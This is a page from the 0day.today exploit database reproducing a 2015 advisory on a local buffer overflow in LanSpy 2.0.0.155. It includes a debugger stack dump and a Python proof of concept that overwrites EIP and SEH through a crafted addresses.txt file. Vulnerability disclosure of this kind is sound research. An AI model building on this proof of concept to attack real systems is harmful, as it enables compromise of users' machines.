0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
LanSpy 2.0.0.155 - Buffer Overflow Exploit
''' [+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-LANSPY-BUFFER-OVERFLOW-10052015.txt Vendor: ================================ www.lantricks.com Product: ================================ LanSpy.exe LanSpy is network security and port scanner, which allows getting different information about computer: Domain and NetBios names, MAC address, Server information, Domain and Domain controller etc.... Vulnerability Type: =================== Buffer Overflow CVE Reference: ============== N/A Vulnerability Details: ====================== LanSpy.exe uses an 'addresses.txt' plain text file which lives under the main LanSpy directory the file is used to load scanned IPs or URLs e.g. 127.0.0.1 replace addresses.txt file with our malicious one, the buffer overflow payload must be the very first entry in the text file. Next, run LanSpy.exe and click green arrow or use keyboard press 'F3' to start. Then KABOOM!... program crashez and we will control EIP at 684 bytes also overwrite both the NSEH & SEH exception handler pointers... Quick stack dump... (1274.19c4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0264fb41 ebx=00418d7c ecx=0264fe84 edx=00000000 esi=00000000 edi=00000000 eip=41414141 esp=0264fe8c ebp=41414141 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 41414141 ?? ??? 0:001> g (1274.19c4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=52525252 edx=7714b4ad esi=00000000 edi=00000000 eip=52525252 esp=0264f8f0 ebp=0264f910 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 52525252 ?? ??? 0:001> !exchain 0264f904: ntdll!LdrRemoveLoadAsDataTable+d64 (7714b4ad) 0264fe8c: 52525252 Invalid exception stack at 42424242 POC code(s): ============= ''' import os #LanSpy.exe buffer overflow POC #by hyp3rlinx #hyp3rlinx.altervista.org #============================= #LanSpy.exe uses an 'addresses.txt' text file #which lives under the LanSpy directory #the addresses.txt file is used to load scanned IPs or URLs #control EIP at 684 bytes... also overwrite #both the NSEH & SEH exception handler pointers #----------------------------------------------- payload="A"*684+"BBBB"+"RRRR" #<------- KABOOOOOOOOOOOOOOOOOOM! file=open("C:\\Program Files (x86)\\LanTricks\\LanSpy\\addresses.txt", "w") file.write(payload) file.close() ''' Public Disclosure: =================== October 5, 2015 Exploitation Technique: ======================= Local =========================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx ''' # 0day.today [2024-11-16] #